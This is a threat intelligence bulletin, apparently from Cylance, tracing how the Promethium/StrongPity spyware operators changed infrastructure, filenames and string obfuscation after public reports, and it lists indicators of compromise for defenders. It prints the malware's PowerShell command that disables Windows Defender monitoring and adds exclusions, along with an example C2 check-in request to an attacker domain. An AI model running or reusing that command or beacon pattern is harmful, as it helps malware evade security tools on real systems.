Whack-A-Mole: The Impact of Threat Intelligence on Adversaries

Introduction

One of the great paradoxes in cybersecurity is that as defenders race ahead to identify the next and newest methods of attack, attackers often lag behind and reuse the old and obvious ones with success.

A similar irony haunts threat intelligence research.

Often, when researchers identify and unveil the work of threat groups, the malicious activity exposed disappears from view, and the researchers move on.

The trouble is, the more advanced threat actors often do not. And with more people looking ahead rather than behind, attackers are free to restructure old attacks and resume them.

In this Threat Intelligence Bulletin, Cylance looks back and traces the changes one such threat actor made – the one behind malware known as Promethium or StrongPity – after a number of researchers at different organizations exposed aspects of both their malware toolset as well as their methods of deployment.

Readers of this blog will learn how easy it is for threat actors to change course after the publication of threat intelligence reports and how valuable it can be for researchers, organizations and the public they serve to keep looking back.

Background and Discussion

In March of 2018, researchers at Citizen Lab, an interdisciplinary research institute of the University of Toronto focused on the overlap of technology, human rights, and security, published a lengthy report in their Free Expression Online series called “Bad Traffic.”

Their findings shed light on what they said was the apparent use of Sandvine/Procera Deep Packet Inspection (DPI) hardware to essentially “man-in-the-middle” benign Internet traffic and insert malware known as Promethium (a.k.a. StrongPity) to targeted regions in Turkey and, indirectly, into Syria. They also claimed to uncover the apparent use of these DPI boxes to “covertly raise money through affiliate ads and cryptocurrency mining in Egypt” .   

It was a notable report, not just because of its content, but also because it was a good example of the power of a communal effort in public threat intelligence and research. What Citizen Lab did was to effectively synthesize prior findings published by a number of disparate groups about both malware and new delivery methods and put them together with their own original research to yield new insights.

Citizen Lab first drew on 2016 research by Kaspersky Lab into malware called StrongPity – research that was expanded upon later that year by Microsoft, which calls the malware Promethium.

Then Citizen Lab incorporated the findings of researchers at ESET, who noted the apparent use of a Promethium/StrongPity variant being used at the Internet Service Provider (ISP) level in two unnamed countries . Citizen Lab’s research suggested that the countries to which the ESET researchers were referring were in fact Turkey and Egypt.

It should be noted that spokespeople for Sandvine/Procera and their owner Francisco Partners strenuously denied the findings of Citizen Lab. Nevertheless, Citizen Lab’s research, complete with technical indicators of compromise regarding the Promethium malware, resulted in coverage in several media outlets, including the Wall Street Journal as recently as July of this year.

In March, almost immediately upon publication by Citizen Lab, Cylance observed the threat actors behind the malware described in their report change tack. We believe the malware is likely part of yet another commercial (grayware) solution sold to governments and law enforcement agencies, and we have reason to believe it bears a strong connection to a company based in Italy – a lead we hope to investigate in the near future.

Technical Analysis

Two months after the Citizen Lab report, Cylance found new Promethium/StrongPity activity, utilizing new infrastructure. The observed domains all appeared to have been registered about two weeks after Citizen Lab’s report.  The malware has continued to adapt as new information is published. Minimal effort and code changes were all that was required to stay out of the limelight. Cylance observed new domains, new IP addresses, filename changes, and small code obfuscation changes.

In the Citizen Lab report, researchers said that Promethium/StrongPity malware was inserted into Internet traffic after users made legitimate requests for common, often free application installers.

In this latest run, Cylance found the following legitimate installers were targeted by the unknown operators of the malware, many of which are exactly the same as those cited in the original Citizen Lab report:

Host Indicators:

In addition, Cylance observed several new filenames and paths utilized by the latest round of droppers:

  •    %windows%\system32\IpeOve32.exe
  •    %temp%\ AC315BA-864X-64AA-C23B-C3DDC042AB2\evntwn32.xml
  •    %temp%\AC315BA-864X-64AA-C23B-C3DDC042AB2\mscorw32.xml
  •    %windows%\system32\netplviz.exe

The “netplvliz.exe” binary is installed as a service with the display name “Advanced User Accounts Control” to maintain persistence on affected systems. Its primary role is to launch the “IpeOve32.exe” binary which performs the bulk of the malicious actions.

The new droppers additionally take advantage of the following PowerShell command:

powershell.exe Set-MpPreference -ExclusionPath 'C:\Windows\System32', 'C:\Windows\SysWOW64', 'C:\DOCUME~1\<USER>~1\LOCALS~1\Temp' -MAPSReporting 0 -DisableBehaviorMonitoring 1 -SubmitSamplesConsent 2

This command attempts to alter the default behavior of Windows Defender on Windows 10 systems by excluding the system and temp directories as well as turning off sample submission and disabling behavior monitoring. 

We assume this was done in response to Microsoft’s earlier research and an attempt to keep malicious samples out of the hands of researchers. This type of behavior is relatively unique, though, and will be a dead giveaway if defenders are monitoring PowerShell usage across their networks.

The only major difference Cylance observed in the backdoor involved the encoding methods used for string obfuscation. The group abandoned the previously used configuration files that ESET documented well .

In late March of 2018, the threat actors behind Promethium just pushed sensitive strings like C2 domains onto the stack in Unicode. In May, their method of attack evolved to push encoded Unicode strings onto the stack then XOR those values against a single byte key and subtract one from that value. Both domain names for the malware are stored in this way. In the latest samples Cylance analyzed the XOR keys 0x45 and 0x25 were used to encode C2 domains.

Network Indicators:

The malware Cylance observed will communicate over SSL on port 443 using HTTP requests to the C2 server. In the samples we analyzed, the PHP pages were all unique; however, the samples all communicated to one of five domains over TCP port 443:

1.     ms-sys-security[.]com,
2.     svr-sec2-system[.]com,
3.     upd2-app-state[.]com
4.     srv-mx2-cdn-app[.]com
5.     system-upload-srv[.]com

The malware utilizes a unique User-Agent string “Edge/8.0 (Windows NT [OS Version Number]; Win[32 or 64]; [Processor Architecture])”. An example check-in POST is presented below:

POST /p5Pss34GvX21pxO0bz25vLqU.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  User-Agent: Edge/8.0 (Windows NT 5.1; Win32; x86)
  Host: upd2-app-state.com
  Content-Length: 25
  Connection: Keep-Alive

name=v6_kt38p5_2618871294

Figure 1: Example Initial HTTP POST

To anyone performing SSL traffic inspection this should appear plainly anomalous. The headers “Content-Type” and “Accept” are both repeated due to a programming error and the User-Agent differs substantially from the standard one used by Microsoft’s Edge browser.

Conclusion

The group or groups behind Promethium/StrongPity will likely continue to adapt to security publications about them. It’s clear they have significant resources at their disposal and will continue to evolve as necessary.  Only minor adjustments are needed to be effective as the information security world constantly shifts its focus to the next big news item.  

Defenders and those they serve would do well to think historically and look back more frequently to inspect the “living memory” of threat actor behavior and campaigns in both the target organization’s history as well as that of the larger threat intelligence community.

In this way, defenders can remain attentive to potential threats from behind that they would otherwise have considered “old news” – threats that were done and dealt with by the security community, but which may not be done dealing with their targets.

Appendix

May to August 2018 Updated Activity

SHA256 Hashes:
Trojanized Installers - Droppers
418203a531ceb1f08a21b354bc0d3bf8f157c76b521495c29639d7bffa416b38
61f8dc6d618572a86bd0b646d16186bb6b0fff970947a7df754add4f65ec8625
ae41ba7b4728a6322660443273d7ea6e50c6f804a7d726d0439fac956c7923e7
b14b9c123d19388b81b9ddbb6e7f8807238967db4bd3b8b0be93026a4c7806bb
baafd8f9b5889d49921f5e4c6fc3ca051f42d1c50a6b1db65986bcfb6e10f344
c35a1337f9e0d9ff41800ad5d1925a750813d9e98a13f54e5846426a0a4def8f
42d178417abe68ba9742250ee5eaeb0802e3d0f24c7e585ed200979ed8cd07ea

IpOve32.exe
158e4057f3d2751cf110c5924f289e5b45348f037b3931b9695d3ba045026b4e
645c3ae40a8572fc18ba5808e000dbd52fb1ffff679c044c497189abbcc5c549
6b0a28fe1954ae41e17ffd6b83a2ac7112cc98b64ba6b2a05448d200b42bb2dc
6d4af9f7e14e1ae7f871cd0bcdd87927cde8d236fd9d37e76554729abe3e31e4
79f02a935266a6a8322dec44c7007f7a148d4327f99b3251cba23625de5d5d5e
7c3c9d054e82b4c1b1eeadf1e246850fbd2ad4ee831fb9bc2e21cdd4d30ef225
fa71584f27f5eacca9f3d5644fd06ccebcc14b8394efeaccd38259f8382c26e5
Ad89961b343366abf28faadbdc9f56e25087bafff1b856c05f62b66ac9b5990a
92ff23ab81cc20c4916441547745f336cf612c21a049cdcbb01f11d83a40979e

netplviz.exe
1d0fc58a1167b5d4982c5aba2443a45e26870c51de9621a10f642879b842dac0
35b3eae0eaed90c2f1b4f087aa9f00d5646590fa25d205e2566e3f6e31f757d0
3c6c7a9558ecf7864cf65be5ea08a4a6aa2c2439c956dc988ebb6cf8bc04e272
707ad515c41cd42d696f2d2fb8745af8b36900391db4a477c48f7f75ec4a9c38
7d689fce4d4a8bfb1df041359a3cd4918915a332d11f678039d68f7f6ae5afe5
8f4474b5c3efad963f054f4b18963bf98c3ec746e2ec4c850b0a6196788b2de2
d12b4759bcd3832f76e04f521d5d8829537f008d7bc040c8869474f86fcc2759

C2 Domains:  
dwn-balance[.]net
ms-sys-security[.]com
svr-sec2-system[.]com
upd2-app-state[.]com
srv-mx2-cdn-app[.]com
system-upload-srv[.]com

IP Addresses:
109.201.142[.]122
89.45.67[.]34
46.17.63[.]239
185.193.36[.]109
176.119.28[.]38
151.106.53[.]236

Works Cited

Baumgartner, K. (2016, October 3). On the StrongPity Waterhole Attacks Targeting Italian and Belgian Encryption Users. Retrieved from https://securelist.com/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/76147/

Kafka, F. (2017, December 8). StrongPity2 spyware replaces FinFisher in MitM campaign – ISP involved? Retrieved from ESET: StrongPity2 spyware replaces FinFisher in MitM campaign – ISP involved?

Marczak, B., Dalek, J., McKune, S., Senft, A., Scott-Railton, J., & and Deibert, R. (2018, March 9). BAD TRAFFIC Sandvine’s PacketLogic Devices Used to Deploy Government Spyware in Turkey and Redirect Egyptian Users to Affiliate Ads? Retrieved from Citizen Lab: https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/

Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved from Microsoft Security Intelligence Report Vol. 21: http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf